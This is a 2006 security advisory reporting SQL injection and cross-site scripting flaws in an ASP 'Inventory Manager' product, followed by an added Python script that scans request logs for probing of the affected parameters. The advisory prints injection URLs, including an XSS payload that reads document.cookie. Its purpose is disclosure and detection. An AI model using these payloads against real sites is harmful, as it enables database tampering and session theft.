Related information
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection
MetaCart e-Shop [multiples injection sql (get & post)]
E-commerce Kit 1 PayPal Edition [ injection sql ]
TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerabilities

From: laurent gaffié <saps.audit_(at)_gmail.com>
Date: 16.11.2006
Subject: Inventory Manager [injection sql & xss (get)]

vendor site: http://www.websitedesignsforless.com/
product: Inventory Manager
bug: injection sql & xss (get)
risk: medium

injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=photo&where='[sql]

xss get :
http://site.com/inventory/inventory/display/display_results.asp?category=</textarea>'"><script>alert(document.cookie)</script>

laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: saps.audit@gmail.com
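
Added example (not part of the original advisory or the vendor's code): a Python check that flags logged requests touching the parameters named above, so a defender can look for probing of imager.asp and display_results.asp. The allow-list values, the sample request lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: identifiers the application legitimately sends; adjust per deployment.
ALLOWED = {"pictable": {"inventory"}, "picfield": {"photo"}}
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
SUSPECT = re.compile(r"[<>\"']")  # quote or markup characters after URL decoding

def check_request(url):
    """Return findings for one request URL (path plus query string)."""
    parts = urlsplit(url)
    page = parts.path.rsplit("/", 1)[-1].lower()
    params = {}
    # Lower-case parameter names: classic ASP looks them up case-insensitively.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        params.setdefault(name.lower(), []).append(value)
    findings = []
    if page == "imager.asp":
        # Table and column names cannot be bound as query parameters,
        # so anything outside the allow-list is reported.
        for name, allowed in ALLOWED.items():
            for value in params.get(name, []):
                if not IDENT.fullmatch(value) or value.lower() not in allowed:
                    findings.append(f"{name}: not an allowed identifier")
        if any(SUSPECT.search(v) for v in params.get("where", [])):
            findings.append("where: quote or markup characters")
    elif page == "display_results.asp":
        if any(SUSPECT.search(v) for v in params.get("category", [])):
            findings.append("category: quote or markup characters")
    return findings

# Constructed sample requests (not taken from real logs).
SAMPLE_REQUESTS = [
    "/inventory/inventory/display/imager.asp?pictable=inventory&picfield=photo",
    "/inventory/inventory/display/imager.asp?pictable=%27",
    "/inventory/inventory/display/imager.asp?PicTable=inventory&picfield=photo&where=%27",
    "/inventory/inventory/display/display_results.asp?category=%3C%2Ftextarea%3E",
    "/inventory/inventory/display/display_results.asp?category=tools",
]

def scan(requests):
    """Map each flagged request to its findings; clean requests are omitted."""
    return {r: f for r in requests if (f := check_request(r))}

if __name__ == "__main__":
    for request, findings in scan(SAMPLE_REQUESTS).items():
        print(request, "->", "; ".join(findings))
```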